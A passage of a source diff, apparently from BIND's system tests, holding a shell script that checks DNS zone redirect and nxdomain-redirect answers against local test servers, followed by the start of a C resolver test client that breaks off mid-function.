@10.53.0.2 -b 10.53.0.2 any > dig.out.ns2.test$n || ret=1 +grep "status: NOERROR" dig.out.ns2.test$n > /dev/null || ret=1 +grep "100.100.100.1" dig.out.ns2.test$n > /dev/null || ret=1 +grep "2001:ffff:ffff::6464:6401" dig.out.ns2.test$n > /dev/null || ret=1 +n=`expr $n + 1` +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +echo_i "checking A zone redirect fails for signed nonexist, DO=1 ($n)" +ret=0 +$DIG $DIGOPTS nonexist.signed. +dnssec @10.53.0.2 -b 10.53.0.2 a > dig.out.ns2.test$n || ret=1 +grep "status: NXDOMAIN" dig.out.ns2.test$n > /dev/null || ret=1 +grep "100.100.100.1" dig.out.ns2.test$n > /dev/null && ret=1 +n=`expr $n + 1` +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +echo_i "checking AAAA zone redirect fails for signed nonexist, DO=1 ($n)" +ret=0 +$DIG $DIGOPTS nonexist.signed. +dnssec @10.53.0.2 -b 10.53.0.2 aaaa > dig.out.ns2.test$n || ret=1 +grep "status: NXDOMAIN" dig.out.ns2.test$n > /dev/null || ret=1 +grep "2001:ffff:ffff::6464:6401" dig.out.ns2.test$n > /dev/null && ret=1 +n=`expr $n + 1` +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +echo_i "checking ANY zone redirect fails for signed nonexist, DO=1 ($n)" +ret=0 +$DIG $DIGOPTS nonexist.signed. +dnssec @10.53.0.2 -b 10.53.0.2 any > dig.out.ns2.test$n || ret=1 +grep "status: NXDOMAIN" dig.out.ns2.test$n > /dev/null || ret=1 +grep "100.100.100.1" dig.out.ns2.test$n > /dev/null && ret=1 +grep "2001:ffff:ffff::6464:6401" dig.out.ns2.test$n > /dev/null && ret=1 +n=`expr $n + 1` +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +echo_i "checking A zone redirect fails for nsec3 signed nonexist, DO=1 ($n)" +ret=0 +$DIG $DIGOPTS nonexist.nsec3. 
+dnssec @10.53.0.2 -b 10.53.0.2 a > dig.out.ns2.test$n || ret=1 +grep "status: NXDOMAIN" dig.out.ns2.test$n > /dev/null || ret=1 +grep "100.100.100.1" dig.out.ns2.test$n > /dev/null && ret=1 +grep "IN.NSEC3" dig.out.ns2.test$n > /dev/null || ret=1 +n=`expr $n + 1` +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +echo_i "checking AAAA zone redirect fails for nsec3 signed nonexist, DO=1 ($n)" +ret=0 +$DIG $DIGOPTS nonexist.nsec3. +dnssec @10.53.0.2 -b 10.53.0.2 aaaa > dig.out.ns2.test$n || ret=1 +grep "status: NXDOMAIN" dig.out.ns2.test$n > /dev/null || ret=1 +grep "2001:ffff:ffff::6464:6401" dig.out.ns2.test$n > /dev/null && ret=1 +grep "IN.NSEC3" dig.out.ns2.test$n > /dev/null || ret=1 +n=`expr $n + 1` +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +echo_i "checking ANY zone redirect fails for nsec3 signed nonexist, DO=1 ($n)" +ret=0 +$DIG $DIGOPTS nonexist.nsec3. +dnssec @10.53.0.2 -b 10.53.0.2 any > dig.out.ns2.test$n || ret=1 +grep "status: NXDOMAIN" dig.out.ns2.test$n > /dev/null || ret=1 +grep "100.100.100.1" dig.out.ns2.test$n > /dev/null && ret=1 +grep "2001:ffff:ffff::6464:6401" dig.out.ns2.test$n > /dev/null && ret=1 +grep "IN.NSEC3" dig.out.ns2.test$n > /dev/null || ret=1 +n=`expr $n + 1` +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +echo_i "checking A zone redirect works for nonexist authoritative ($n)" +ret=0 +$DIG $DIGOPTS nonexist. @10.53.0.1 -b 10.53.0.1 a > dig.out.ns1.test$n || ret=1 +grep "status: NOERROR" dig.out.ns1.test$n > /dev/null || ret=1 +grep "100.100.100.2" dig.out.ns1.test$n > /dev/null || ret=1 +n=`expr $n + 1` +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +echo_i "checking AAAA zone redirect works for nonexist authoritative ($n)" +ret=0 +$DIG $DIGOPTS nonexist. 
@10.53.0.1 -b 10.53.0.1 aaaa > dig.out.ns1.test$n || ret=1 +grep "status: NOERROR" dig.out.ns1.test$n > /dev/null || ret=1 +grep "2001:ffff:ffff::6464:6402" dig.out.ns1.test$n > /dev/null || ret=1 +n=`expr $n + 1` +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +echo_i "checking ANY zone redirect works for nonexist authoritative ($n)" +ret=0 +$DIG $DIGOPTS nonexist. @10.53.0.1 -b 10.53.0.1 any > dig.out.ns1.test$n || ret=1 +grep "status: NOERROR" dig.out.ns1.test$n > /dev/null || ret=1 +grep "100.100.100.2" dig.out.ns1.test$n > /dev/null || ret=1 +grep "2001:ffff:ffff::6464:6402" dig.out.ns1.test$n > /dev/null || ret=1 +n=`expr $n + 1` +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +echo_i "checking A zone redirect doesn't work for acl miss authoritative ($n)" +ret=0 +$DIG $DIGOPTS nonexist. @10.53.0.1 -b 10.53.0.4 a > dig.out.ns1.test$n || ret=1 +grep "status: NXDOMAIN" dig.out.ns1.test$n > /dev/null || ret=1 +grep "100.100.100.2" dig.out.ns1.test$n > /dev/null && ret=1 +n=`expr $n + 1` +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +echo_i "checking AAAA zone redirect doesn't work for acl miss authoritative ($n)" +ret=0 +$DIG $DIGOPTS nonexist. @10.53.0.1 -b 10.53.0.4 aaaa > dig.out.ns1.test$n || ret=1 +grep "status: NXDOMAIN" dig.out.ns1.test$n > /dev/null || ret=1 +grep "2001:ffff:ffff::6464:6402" dig.out.ns1.test$n > /dev/null && ret=1 +n=`expr $n + 1` +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +echo_i "checking ANY zone redirect doesn't work for acl miss authoritative ($n)" +ret=0 +$DIG $DIGOPTS nonexist. 
@10.53.0.1 -b 10.53.0.4 any > dig.out.ns1.test$n || ret=1 +grep "status: NXDOMAIN" dig.out.ns1.test$n > /dev/null || ret=1 +grep "100.100.100.2" dig.out.ns1.test$n > /dev/null && ret=1 +grep "2001:ffff:ffff::6464:6402" dig.out.ns1.test$n > /dev/null && ret=1 +n=`expr $n + 1` +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +echo_i "checking A zone redirect works for signed nonexist, DO=0 authoritative ($n)" +ret=0 +$DIG $DIGOPTS nonexist.signed. @10.53.0.1 -b 10.53.0.1 a > dig.out.ns1.test$n || ret=1 +grep "status: NOERROR" dig.out.ns1.test$n > /dev/null || ret=1 +grep "100.100.100.2" dig.out.ns1.test$n > /dev/null || ret=1 +n=`expr $n + 1` +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +echo_i "checking AAAA zone redirect works for signed nonexist, DO=0 authoritative ($n)" +ret=0 +$DIG $DIGOPTS nonexist.signed. @10.53.0.1 -b 10.53.0.1 aaaa > dig.out.ns1.test$n || ret=1 +grep "status: NOERROR" dig.out.ns1.test$n > /dev/null || ret=1 +grep "2001:ffff:ffff::6464:6402" dig.out.ns1.test$n > /dev/null || ret=1 +n=`expr $n + 1` +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +echo_i "checking ANY zone redirect works for signed nonexist, DO=0 authoritative ($n)" +ret=0 +$DIG $DIGOPTS nonexist.signed. @10.53.0.1 -b 10.53.0.1 any > dig.out.ns1.test$n || ret=1 +grep "status: NOERROR" dig.out.ns1.test$n > /dev/null || ret=1 +grep "100.100.100.2" dig.out.ns1.test$n > /dev/null || ret=1 +grep "2001:ffff:ffff::6464:6402" dig.out.ns1.test$n > /dev/null || ret=1 +n=`expr $n + 1` +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +echo_i "checking A zone redirect fails for signed nonexist, DO=1 authoritative ($n)" +ret=0 +$DIG $DIGOPTS nonexist.signed. 
+dnssec @10.53.0.1 -b 10.53.0.1 a > dig.out.ns1.test$n || ret=1 +grep "status: NXDOMAIN" dig.out.ns1.test$n > /dev/null || ret=1 +grep "100.100.100.2" dig.out.ns1.test$n > /dev/null && ret=1 +n=`expr $n + 1` +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +echo_i "checking AAAA zone redirect fails for signed nonexist, DO=1 authoritative ($n)" +ret=0 +$DIG $DIGOPTS nonexist.signed. +dnssec @10.53.0.1 -b 10.53.0.1 aaaa > dig.out.ns1.test$n || ret=1 +grep "status: NXDOMAIN" dig.out.ns1.test$n > /dev/null || ret=1 +grep "2001:ffff:ffff::6464:6402" dig.out.ns1.test$n > /dev/null && ret=1 +n=`expr $n + 1` +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +echo_i "checking ANY zone redirect fails for signed nonexist, DO=1 authoritative ($n)" +ret=0 +$DIG $DIGOPTS nonexist.signed. +dnssec @10.53.0.1 -b 10.53.0.1 any > dig.out.ns1.test$n || ret=1 +grep "status: NXDOMAIN" dig.out.ns1.test$n > /dev/null || ret=1 +grep "100.100.100.2" dig.out.ns1.test$n > /dev/null && ret=1 +grep "2001:ffff:ffff::6464:6402" dig.out.ns1.test$n > /dev/null && ret=1 +n=`expr $n + 1` +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +echo_i "checking A zone redirect fails for nsec3 signed nonexist, DO=1 authoritative ($n)" +ret=0 +$DIG $DIGOPTS nonexist.nsec3. +dnssec @10.53.0.1 -b 10.53.0.1 a > dig.out.ns1.test$n || ret=1 +grep "status: NXDOMAIN" dig.out.ns1.test$n > /dev/null || ret=1 +grep "100.100.100.2" dig.out.ns1.test$n > /dev/null && ret=1 +grep "IN.NSEC3" dig.out.ns1.test$n > /dev/null || ret=1 +n=`expr $n + 1` +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +echo_i "checking AAAA zone redirect fails for nsec3 signed nonexist, DO=1 authoritative ($n)" +ret=0 +$DIG $DIGOPTS nonexist.nsec3. 
+dnssec @10.53.0.1 -b 10.53.0.1 aaaa > dig.out.ns1.test$n || ret=1 +grep "status: NXDOMAIN" dig.out.ns1.test$n > /dev/null || ret=1 +grep "2001:ffff:ffff::6464:6402" dig.out.ns1.test$n > /dev/null && ret=1 +grep "IN.NSEC3" dig.out.ns1.test$n > /dev/null || ret=1 +n=`expr $n + 1` +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +echo_i "checking ANY zone redirect fails for nsec3 signed nonexist, DO=1 authoritative ($n)" +ret=0 +$DIG $DIGOPTS nonexist.nsec3. +dnssec @10.53.0.1 -b 10.53.0.1 any > dig.out.ns1.test$n || ret=1 +grep "status: NXDOMAIN" dig.out.ns1.test$n > /dev/null || ret=1 +grep "100.100.100.2" dig.out.ns1.test$n > /dev/null && ret=1 +grep "2001:ffff:ffff::6464:6402" dig.out.ns1.test$n > /dev/null && ret=1 +grep "IN.NSEC3" dig.out.ns1.test$n > /dev/null || ret=1 +n=`expr $n + 1` +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +echo_i "checking zone redirect works (with noerror) when qtype is not found ($n)" +ret=0 +$DIG $DIGOPTS nonexist. @10.53.0.2 -b 10.53.0.2 txt > dig.out.ns2.test$n || ret=1 +grep "status: NOERROR" dig.out.ns2.test$n > /dev/null || ret=1 +n=`expr $n + 1` +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +echo_i "checking that redirect zones reload correctly" +ret=0 +sleep 1 # ensure file mtime will have changed +tr -d '\r' < ns2/example.db.in | sed -e 's/0 0 0 0 0/1 0 0 0 0/' > ns2/example.db +tr -d '\r' < ns2/redirect.db.in | sed -e 's/0 0 0 0 0/1 0 0 0 0/' -e 's/\.1$/.2/' > ns2/redirect.db +rndc_reload ns2 10.53.0.2 +for i in 1 2 3 4 5 6 7 8 9; do + tmp=0 + $DIG $DIGOPTS +short @10.53.0.2 soa example.nil > dig.out.ns1.test$n || tmp=1 + set -- `cat dig.out.ns1.test$n` + [ $3 = 1 ] || tmp=1 + $DIG $DIGOPTS nonexist. 
@10.53.0.2 -b 10.53.0.2 a > dig.out.ns2.test$n || tmp=1 + grep "status: NOERROR" dig.out.ns2.test$n > /dev/null || tmp=1 + grep "100.100.100.2" dig.out.ns2.test$n > /dev/null || tmp=1 + [ $tmp -eq 0 ] && break + sleep 1 +done +[ $tmp -eq 1 ] && ret=1 +n=`expr $n + 1` +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +echo_i "checking A nxdomain-redirect works for nonexist ($n)" +ret=0 +$DIG $DIGOPTS nonexist. @10.53.0.4 -b 10.53.0.2 a > dig.out.ns4.test$n || ret=1 +grep "status: NOERROR" dig.out.ns4.test$n > /dev/null || ret=1 +grep "nonexist. .*100.100.100.1" dig.out.ns4.test$n > /dev/null || ret=1 +n=`expr $n + 1` +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +echo_i "checking AAAA nxdomain-redirect works for nonexist ($n)" +ret=0 +rm ns4/named.stats 2>/dev/null +$RNDCCMD 10.53.0.4 stats || ret=1 +PRE_RED=`tr -d '\r' < ns4/named.stats | sed -n -e "s/[ ]*\([0-9]*\).queries resulted in NXDOMAIN that were redirected$/\1/p"` +PRE_SUC=`tr -d '\r' < ns4/named.stats | sed -n -e "s/[ ]*\([0-9]*\).queries resulted in NXDOMAIN that were redirected and resulted in a successful remote lookup$/\1/p"` +$DIG $DIGOPTS nonexist. @10.53.0.4 -b 10.53.0.2 aaaa > dig.out.ns4.test$n || ret=1 +grep "status: NOERROR" dig.out.ns4.test$n > /dev/null || ret=1 +grep "nonexist. 
.*2001:ffff:ffff::6464:6401" dig.out.ns4.test$n > /dev/null || ret=1 +n=`expr $n + 1` +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +echo_i "checking AAAA nxdomain-redirect updates statistics ($n)" +ret=0 +rm ns4/named.stats 2>/dev/null +$RNDCCMD 10.53.0.4 stats || ret=1 +POST_RED=`tr -d '\r' < ns4/named.stats | sed -n -e "s/[ ]*\([0-9]*\).queries resulted in NXDOMAIN that were redirected$/\1/p"` +POST_SUC=`tr -d '\r' < ns4/named.stats | sed -n -e "s/[ ]*\([0-9]*\).queries resulted in NXDOMAIN that were redirected and resulted in a successful remote lookup$/\1/p"` +if [ `expr $POST_RED - $PRE_RED` != 1 ]; then ret=1; fi +if [ `expr $POST_SUC - $PRE_SUC` != 1 ]; then ret=1; fi +n=`expr $n + 1` +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +echo_i "checking ANY nxdomain-redirect works for nonexist ($n)" +ret=0 +$DIG $DIGOPTS nonexist. @10.53.0.4 -b 10.53.0.2 any > dig.out.ns4.test$n || ret=1 +grep "status: NOERROR" dig.out.ns4.test$n > /dev/null || ret=1 +grep "100.100.100.1" dig.out.ns4.test$n > /dev/null || ret=1 +grep "2001:ffff:ffff::6464:6401" dig.out.ns4.test$n > /dev/null || ret=1 +n=`expr $n + 1` +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +echo_i "checking A nxdomain-redirect works for signed nonexist, DO=0 ($n)" +ret=0 +$DIG $DIGOPTS nonexist.signed. @10.53.0.4 -b 10.53.0.2 a > dig.out.ns4.test$n || ret=1 +grep "status: NOERROR" dig.out.ns4.test$n > /dev/null || ret=1 +grep "100.100.100.1" dig.out.ns4.test$n > /dev/null || ret=1 +n=`expr $n + 1` +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +echo_i "checking AAAA nxdomain-redirect works for signed nonexist, DO=0 ($n)" +ret=0 +$DIG $DIGOPTS nonexist.signed. 
@10.53.0.4 -b 10.53.0.2 aaaa > dig.out.ns4.test$n || ret=1 +grep "status: NOERROR" dig.out.ns4.test$n > /dev/null || ret=1 +grep "2001:ffff:ffff::6464:6401" dig.out.ns4.test$n > /dev/null || ret=1 +n=`expr $n + 1` +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +echo_i "checking ANY nxdomain-redirect works for signed nonexist, DO=0 ($n)" +ret=0 +$DIG $DIGOPTS nonexist.signed. @10.53.0.4 -b 10.53.0.2 any > dig.out.ns4.test$n || ret=1 +grep "status: NOERROR" dig.out.ns4.test$n > /dev/null || ret=1 +grep "100.100.100.1" dig.out.ns4.test$n > /dev/null || ret=1 +grep "2001:ffff:ffff::6464:6401" dig.out.ns4.test$n > /dev/null || ret=1 +n=`expr $n + 1` +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +echo_i "checking A nxdomain-redirect fails for signed nonexist, DO=1 ($n)" +ret=0 +$DIG $DIGOPTS nonexist.signed. +dnssec @10.53.0.4 -b 10.53.0.2 a > dig.out.ns4.test$n || ret=1 +grep "status: NXDOMAIN" dig.out.ns4.test$n > /dev/null || ret=1 +grep "100.100.100.1" dig.out.ns4.test$n > /dev/null && ret=1 +n=`expr $n + 1` +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +echo_i "checking AAAA nxdomain-redirect fails for signed nonexist, DO=1 ($n)" +ret=0 +$DIG $DIGOPTS nonexist.signed. +dnssec @10.53.0.4 -b 10.53.0.2 aaaa > dig.out.ns4.test$n || ret=1 +grep "status: NXDOMAIN" dig.out.ns4.test$n > /dev/null || ret=1 +grep "2001:ffff:ffff::6464:6401" dig.out.ns4.test$n > /dev/null && ret=1 +n=`expr $n + 1` +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +echo_i "checking ANY nxdomain-redirect fails for signed nonexist, DO=1 ($n)" +ret=0 +$DIG $DIGOPTS nonexist.signed. 
+dnssec @10.53.0.4 -b 10.53.0.2 any > dig.out.ns4.test$n || ret=1 +grep "status: NXDOMAIN" dig.out.ns4.test$n > /dev/null || ret=1 +grep "100.100.100.1" dig.out.ns4.test$n > /dev/null && ret=1 +grep "2001:ffff:ffff::6464:6401" dig.out.ns4.test$n > /dev/null && ret=1 +n=`expr $n + 1` +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +echo_i "checking A nxdomain-redirect fails for nsec3 signed nonexist, DO=1 ($n)" +ret=0 +$DIG $DIGOPTS nonexist.nsec3. +dnssec @10.53.0.4 -b 10.53.0.2 a > dig.out.ns4.test$n || ret=1 +grep "status: NXDOMAIN" dig.out.ns4.test$n > /dev/null || ret=1 +grep "100.100.100.1" dig.out.ns4.test$n > /dev/null && ret=1 +grep "IN.NSEC3" dig.out.ns4.test$n > /dev/null || ret=1 +n=`expr $n + 1` +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +echo_i "checking AAAA nxdomain-redirect fails for nsec3 signed nonexist, DO=1 ($n)" +ret=0 +$DIG $DIGOPTS nonexist.nsec3. +dnssec @10.53.0.4 -b 10.53.0.2 aaaa > dig.out.ns4.test$n || ret=1 +grep "status: NXDOMAIN" dig.out.ns4.test$n > /dev/null || ret=1 +grep "2001:ffff:ffff::6464:6401" dig.out.ns4.test$n > /dev/null && ret=1 +grep "IN.NSEC3" dig.out.ns4.test$n > /dev/null || ret=1 +n=`expr $n + 1` +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +echo_i "checking ANY nxdomain-redirect fails for nsec3 signed nonexist, DO=1 ($n)" +ret=0 +$DIG $DIGOPTS nonexist.nsec3. +dnssec @10.53.0.4 -b 10.53.0.2 any > dig.out.ns4.test$n || ret=1 +grep "status: NXDOMAIN" dig.out.ns4.test$n > /dev/null || ret=1 +grep "100.100.100.1" dig.out.ns4.test$n > /dev/null && ret=1 +grep "2001:ffff:ffff::6464:6401" dig.out.ns4.test$n > /dev/null && ret=1 +grep "IN.NSEC3" dig.out.ns4.test$n > /dev/null || ret=1 +n=`expr $n + 1` +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +echo_i "checking nxdomain-redirect works (with noerror) when qtype is not found ($n)" +ret=0 +$DIG $DIGOPTS nonexist. 
@10.53.0.4 -b 10.53.0.2 txt > dig.out.ns4.test$n || ret=1 +grep "status: NOERROR" dig.out.ns4.test$n > /dev/null || ret=1 +n=`expr $n + 1` +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +echo_i "checking nxdomain-redirect against authoritative zone ($n)" +ret=0 +$DIG $DIGOPTS nonexist.example @10.53.0.4 -b 10.53.0.2 a > dig.out.ns4.test$n || ret=1 +grep "status: NOERROR" dig.out.ns4.test$n > /dev/null || ret=1 +n=`expr $n + 1` +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +echo_i "checking tld nxdomain-redirect against signed root zone ($n)" +ret=0 +$DIG $DIGOPTS @10.53.0.5 asdfasdfasdf > dig.out.ns5.test$n || ret=1 +grep "status: NXDOMAIN" dig.out.ns5.test$n > /dev/null || ret=1 +n=`expr $n + 1` +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +echo_i "checking tld nxdomain-redirect against unsigned root zone ($n)" +ret=0 +$DIG $DIGOPTS @10.53.0.6 asdfasdfasdf > dig.out.ns6.test$n || ret=1 +grep "status: NXDOMAIN" dig.out.ns6.test$n > /dev/null || ret=1 +n=`expr $n + 1` +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +echo_i "exit status: $status" +[ $status -eq 0 ] || exit 1 diff --git a/bin/tests/system/resolve.c b/bin/tests/system/resolve.c new file mode 100644 index 0000000..8915773 --- /dev/null +++ b/bin/tests/system/resolve.c 
@@ -0,0 +1,501 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +#ifndef WIN32 +#include <arpa/inet.h> +#include <netdb.h> +#include <netinet/in.h> +#include <sys/socket.h> +#include <sys/types.h> +#include <unistd.h> +#endif /* ifndef WIN32 */ + +#include <stdbool.h> +#include <stdio.h> +#include <stdlib.h> +#include <string.h> + +#include <isc/app.h> +#include <isc/base64.h> +#include <isc/buffer.h> +#include <isc/commandline.h> +#include <isc/lib.h> +#include <isc/managers.h> +#include <isc/mem.h> +#include <isc/print.h> +#include <isc/sockaddr.h> +#include <isc/socket.h> +#include <isc/task.h> +#include <isc/timer.h> +#include <isc/util.h> + +#include <dns/client.h> +#include <dns/fixedname.h> +#include <dns/keyvalues.h> +#include <dns/lib.h> +#include <dns/name.h> +#include <dns/rdata.h> +#include <dns/rdataset.h> +#include <dns/rdatastruct.h> +#include <dns/rdatatype.h> +#include <dns/result.h> +#include <dns/secalg.h> + +#include <dst/dst.h> + +#include <irs/resconf.h> + +static char *algname; + +static isc_result_t +printdata(dns_rdataset_t *rdataset, dns_name_t *owner) { + isc_buffer_t target; + isc_result_t result; + isc_region_t r; + char t[4096]; + + if (!dns_rdataset_isassociated(rdataset)) { + printf("[WARN: empty]\n"); + return (ISC_R_SUCCESS); + } + + isc_buffer_init(&target, t, sizeof(t)); + + result = dns_rdataset_totext(rdataset, owner, false, false, &target); + if (result != ISC_R_SUCCESS) { + return (result); + } + isc_buffer_usedregion(&target, &r); + printf("%.*s", (int)r.length, (char *)r.base); + + return (ISC_R_SUCCESS); +} + 
+ISC_PLATFORM_NORETURN_PRE static void +usage(void) ISC_PLATFORM_NORETURN_POST; + +static void +usage(void) { + fprintf(stderr, "resolve [-t RRtype] " + "[[-a algorithm] [-e] -k keyname -K keystring] " + "[-S domain:serveraddr_for_domain ] [-s server_address]" + "[-b address[#port]] hostname\n"); + + exit(1); +} + +static void +set_key(dns_client_t *client, char *keynamestr, char *keystr, bool is_sep, + isc_mem_t **mctxp) { + isc_result_t result; + dns_fixedname_t fkeyname; + unsigned int namelen; + dns_name_t *keyname; + dns_rdata_dnskey_t keystruct; + unsigned char keydata[4096]; + isc_buffer_t keydatabuf; + unsigned char rrdata[4096]; + isc_buffer_t rrdatabuf; + isc_buffer_t b; + isc_textregion_t tr; + isc_region_t r; + dns_secalg_t alg; + + isc_mem_create(mctxp); + + if (algname != NULL) { + tr.base = algname; + tr.length = strlen(algname); + result = dns_secalg_fromtext(&alg, &tr); + if (result != ISC_R_SUCCESS) { + fprintf(stderr, "failed to identify the algorithm\n"); + exit(1); + } + } else { + alg = DNS_KEYALG_RSASHA1; + } + + keystruct.common.rdclass = dns_rdataclass_in; + keystruct.common.rdtype = dns_rdatatype_dnskey; + keystruct.flags = DNS_KEYOWNER_ZONE; /* fixed */ + if (is_sep) { + keystruct.flags |= DNS_KEYFLAG_KSK; + } + keystruct.protocol = DNS_KEYPROTO_DNSSEC; /* fixed */ + keystruct.algorithm = alg; + + isc_buffer_init(&keydatabuf, keydata, sizeof(keydata)); + isc_buffer_init(&rrdatabuf, rrdata, sizeof(rrdata)); + result = isc_base64_decodestring(keystr, &keydatabuf); + if (result != ISC_R_SUCCESS) { + fprintf(stderr, "base64 decode failed\n"); + exit(1); + } + isc_buffer_usedregion(&keydatabuf, &r); + keystruct.datalen = r.length; + keystruct.data = r.base; + + result = dns_rdata_fromstruct(NULL, keystruct.common.rdclass, + keystruct.common.rdtype, &keystruct, + &rrdatabuf); + if (result != ISC_R_SUCCESS) { + fprintf(stderr, "failed to construct key rdata\n"); + exit(1); + } + namelen = strlen(keynamestr); + isc_buffer_init(&b, keynamestr, 
namelen); + isc_buffer_add(&b, namelen); + keyname = dns_fixedname_initname(&fkeyname); + result = dns_name_fromtext(keyname, &b, dns_rootname, 0, NULL); + if (result != ISC_R_SUCCESS) { + fprintf(stderr, "failed to construct key name\n"); + exit(1); + } + result = dns_client_addtrustedkey(client, dns_rdataclass_in, + dns_rdatatype_dnskey, keyname, + &rrdatabuf); + if (result != ISC_R_SUCCESS) { + fprintf(stderr, "failed to add key for %s\n", keynamestr); + exit(1); + } +} + +static void +addserver(dns_client_t *client, const char *addrstr, const char *port, + const char *name_space) { + struct addrinfo hints, *res; + int gaierror; + isc_sockaddr_t sa; + isc_sockaddrlist_t servers; + isc_result_t result; + unsigned int namelen; + isc_buffer_t b; + dns_fixedname_t fname; + dns_name_t *name = NULL; + + memset(&hints, 0, sizeof(hints)); + hints.ai_family = AF_UNSPEC; + hints.ai_socktype = SOCK_DGRAM; + hints.ai_protocol = IPPROTO_UDP; + hints.ai_flags = AI_NUMERICHOST; + gaierror = getaddrinfo(addrstr, port, &hints, &res); + if (gaierror != 0) { + fprintf(stderr, "getaddrinfo failed: %s\n", + gai_strerror(gaierror)); + exit(1); + } + INSIST(res->ai_addrlen <= sizeof(sa.type)); + memmove(&sa.type, res->ai_addr, res->ai_addrlen); + sa.length = (unsigned int)res->ai_addrlen; + freeaddrinfo(res); + ISC_LINK_INIT(&sa, link); + ISC_LIST_INIT(servers); + ISC_LIST_APPEND(servers, &sa, link); + + if (name_space != NULL) { + namelen = strlen(name_space); + isc_buffer_constinit(&b, name_space, namelen); + isc_buffer_add(&b, namelen); + name = dns_fixedname_initname(&fname); + result = dns_name_fromtext(name, &b, dns_rootname, 0, NULL); + if (result != ISC_R_SUCCESS) { + fprintf(stderr, "failed to convert qname: %u\n", + result); + exit(1); + } + } + + result = dns_client_setservers(client, dns_rdataclass_in, name, + &servers); + if (result != ISC_R_SUCCESS) { + fprintf(stderr, "set server failed: %u\n", result); + exit(1); + } +} + +int +main(int argc, char *argv[]) { + int ch; 
+ isc_textregion_t tr; + char *server = NULL; + char *altserver = NULL; + char *altserveraddr = NULL; + char *altservername = NULL; + dns_client_t *client = NULL; + char *keynamestr = NULL; + char *keystr = NULL; + isc_result_t result; + isc_buffer_t b; + dns_fixedname_t qname0; + unsigned int namelen; + dns_name_t *qname, *name; + dns_rdatatype_t type = dns_rdatatype_a; + dns_rdataset_t *rdataset; + dns_namelist_t namelist; + isc_mem_t *keymctx = NULL; + unsigned int clientopt, resopt = 0; + bool is_sep = false; + const char *port = "53"; + isc_mem_t *mctx = NULL; + isc_appctx_t *actx = NULL; + isc_nm_t *netmgr = NULL; + isc_taskmgr_t *taskmgr = NULL; + isc_socketmgr_t *socketmgr = NULL; + isc_timermgr_t *timermgr = NULL; + struct in_addr in4; + struct in6_addr in6; + isc_sockaddr_t a4, a6; + isc_sockaddr_t *addr4 = NULL, *addr6 = NULL; + + while ((ch = isc_commandline_parse(argc, argv, "a:b:es:t:k:K:p:S:")) != + -1) + { + switch (ch) { + case 't': + tr.base = isc_commandline_argument; + tr.length = strlen(isc_commandline_argument); + result = dns_rdatatype_fromtext(&type, &tr); + if (result != ISC_R_SUCCESS) { + fprintf(stderr, "invalid RRtype: %s\n", + isc_commandline_argument); + exit(1); + } + break; + case 'a': + algname = isc_commandline_argument; + break; + case 'b': + if (inet_pton(AF_INET, isc_commandline_argument, + &in4) == 1) + { + if (addr4 != NULL) { + fprintf(stderr, "only one local " + "address per family " + "can be specified\n"); + exit(1); + } + isc_sockaddr_fromin(&a4, &in4, 0); + addr4 = &a4; + } else if (inet_pton(AF_INET6, isc_commandline_argument, + &in6) == 1) + { + if (addr6 != NULL) { + fprintf(stderr, "only one local " + "address per family " + "can be specified\n"); + exit(1); + } + isc_sockaddr_fromin6(&a6, &in6, 0); + addr6 